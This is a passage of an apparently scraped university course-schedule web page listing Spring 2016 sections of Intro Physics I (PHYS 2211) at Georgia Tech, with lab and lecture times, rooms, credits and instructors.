<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 125</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21005">Intro Physics I - 21005 - PHYS 2211 - C02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21006">Intro Physics I - 21006 - PHYS 2211 - C03</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">12:05 pm - 1:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 2:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21007">Intro Physics I - 21007 - PHYS 2211 - C04</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">2:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 131</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</></table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21008">Intro Physics I - 21008 - PHYS 2211 - C05</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">1:05 pm - 2:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21009">Intro Physics I - 21009 - PHYS 2211 - C06</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 123</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">5:05 pm - 6:55 pm</td>
<td class="dddefault">W</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21010">Intro Physics I - 21010 - PHYS 2211 - C07</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 4:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">5:05 pm - 5:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 125</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21585">Intro Physics I - 21585 - PHYS 2211 - C08</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 4:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 127</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">5:05 pm - 6:55 pm</td>
<td class="dddefault">R</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=22034">Intro Physics I - 22034 - PHYS 2211 - C09</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 3:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 325</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">4:05 pm - 5:55 pm</td>
<td class="dddefault">T</td>
<td class="dddefault">Clough Undergraduate Commons 346</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Eric R. Murray (<abbr title="Primary">P</abbr>)<a href="mailto:eric.murray@physics.gatech.edu" target="Eric R. Murray"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21017">Intro Physics I - 21017 - PHYS 2211 - K</a></th>
</tr>
<tr>
<td class="dddefault">
PHYS2211K
introduces both modern topics (e.g. relativity & quantum
physics) and modern tools such as computer modeling.
Prerequisites are the same as the standard 2211 offering.
This course uses a different textbook than the standard 2211
sections, called Matter & Interactions. No previous
computer programming experience is required.
No lab exemptions are offered.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">9:05 am - 9:55 am</td>
<td class="dddefault">MWF</td>
<td class="dddefault">Howey (Physics) L4</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">6:05 pm - 7:25 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Howey (Physics) L3</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Lecture*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20992">Intro Physics I - 20992 - PHYS 2211 - K01</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 372</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
<td class="dddefault">Edwin F Greco (<abbr title="Primary">P</abbr>)<a href="mailto:ed.greco@gatech.edu" target="Edwin F. Greco"><img src="/wtlgifs/web_email.gif" align="middle" alt="E-mail" class="headerImg" title="E-mail" name="web_email" hspace="0" vspace="0" border="0" height="28" width="28"></a></td>
</tr>
</table>
<br>
<br>
</td>
</tr>
<tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=20993">Intro Physics I - 20993 - PHYS 2211 - K02</a></th>
</tr>
<tr>
<td class="dddefault">
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Supervised Laboratory* Schedule Type
<br>
0.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>ALP
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
<th class="ddheader" scope="col">Days</th>
<th class="ddheader" scope="col">Where</th>
<th class="ddheader" scope="col">Date Range</th>
<th class="ddheader" scope="col">Schedule Type</th>
<th class="ddheader" scope="col">Instructors</th>
</tr>
<tr>
<td class="dddefault">Class</td>
<td class="dddefault">3:05 pm - 5:55 pm</td>
<td class="dddefault">M</td>
<td class="dddefault">Clough Undergraduate Commons 362</td>
<td class="dddefault">Jan 11, 2016 - May 05, 2016</td>
<td class="dddefault">Supervised Laboratory*</td>
